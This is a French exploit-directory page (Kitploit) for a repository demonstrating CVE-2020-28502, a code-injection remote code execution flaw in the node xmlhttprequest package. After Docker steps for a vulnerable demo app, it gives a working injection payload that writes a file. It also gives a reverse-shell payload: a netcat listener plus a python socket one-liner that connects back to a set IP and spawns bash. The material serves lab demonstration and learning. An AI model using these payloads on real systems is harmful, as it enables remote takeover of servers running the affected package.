Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/s-index/cve-2020-28502
Analyse des VulnérabilitésExploitationExploitation d'Applications WebApprentissage et ÉducationOutil d'Accès à DistanceDéveloppement de Charges Utiles
GitHubs-index/cve-2020-28502

CVE-2020-28502

CVE-2020-28502 node-XMLHttpRequest RCE

Voir le dépôt
3250il y a 5 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2020-28502 node-XMLHttpRequest RCE

Description NVD

Cela affecte le paquet xmlhttprequest avant la version 1.7.0 ; toutes les versions du paquet xmlhttprequest-ssl. À condition que les requêtes soient envoyées de manière synchrone (async=False sur xhr.open), une entrée utilisateur malveillante circulant dans xhr.send pourrait entraîner l'injection et l'exécution de code arbitraire.

Démo

cve-2020-28502

Mise en place

  1. Construire une image à partir d'un Dockerfile
root@kitploit:~
$ docker build -t cve-2020-28502 .
  1. Exécuter node app.js dans un nouveau conteneur
root@kitploit:~
$ docker run --rm -p 3000:3000 cve-2020-28502
  1. Accéder à http://localhost:3000

localhost-image

Payload PoC

Ajouter un fichier

Télécharger l’outil

Soumettre le payload

root@kitploit:~
\');require("fs").writeFileSync("./exploit.txt", "exploit!");req.end();//

Reverse Shell

  1. Mettre le client en écoute
root@kitploit:~
$ nc -l 8888
  1. Soumettre le payload

remplacez l'adresse IP (192.168.0.25) par votre adresse IP locale

root@kitploit:~
\');require("child_process").exec("python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.0.25\",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")'");req.end();//

Référence

  • https://snyk.io/vuln/SNYK-JS-XMLHTTPREQUEST-1082935